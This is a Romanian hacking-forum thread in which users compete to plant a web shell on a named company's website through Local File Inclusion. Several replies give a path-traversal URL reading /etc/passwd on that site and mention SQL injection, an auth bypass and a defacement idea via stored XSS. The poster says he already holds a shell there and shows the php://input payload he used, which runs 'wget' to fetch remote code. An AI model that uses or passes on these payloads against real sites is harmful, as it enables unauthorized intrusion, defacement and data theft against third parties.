FoxKids Posted October 13, 2013 Report Posted October 13, 2013 In acest challange trebuie sa uploadati un shell intr-un site prin metoda Locale File IncludeDupa ce terminati challange-ul trimiteti-mi link la shell pe privat.Link Vulnerabil: HC HR Consulting Team - Recrutare, Consultanta, SSM - meta_title_roCastigatori-------Prof. Quote
dr.d3v1l Posted October 13, 2013 Report Posted October 13, 2013 (edited) sigur ca è posibil ? www.hchr.ro/?page=../../../../../../../../../../../../******************************* (etc/passwdVad un Sql Edited October 13, 2013 by dr.d3v1l Quote
Active Members dancezar Posted October 13, 2013 Active Members Report Posted October 13, 2013 (edited) esti si sqli si ath bypass//Poti pune si un proof? Edited October 13, 2013 by danyweb09 Quote
florin_darck Posted October 13, 2013 Report Posted October 13, 2013 (edited) PArerea mea: Vrei sa-ti bage tie cineva shell prin LFI ca tu nu reusestips: Daca tot vrea sa dea deface, tare greu era un deface via stored xss in admin panel Edited October 13, 2013 by florin_darck Quote
FoxKids Posted October 13, 2013 Author Report Posted October 13, 2013 Eu deja am shell in firma ... are securitate 0... si lam uploadat prin php://input <? system ('wget link'); ?> o sa revin cu print Quote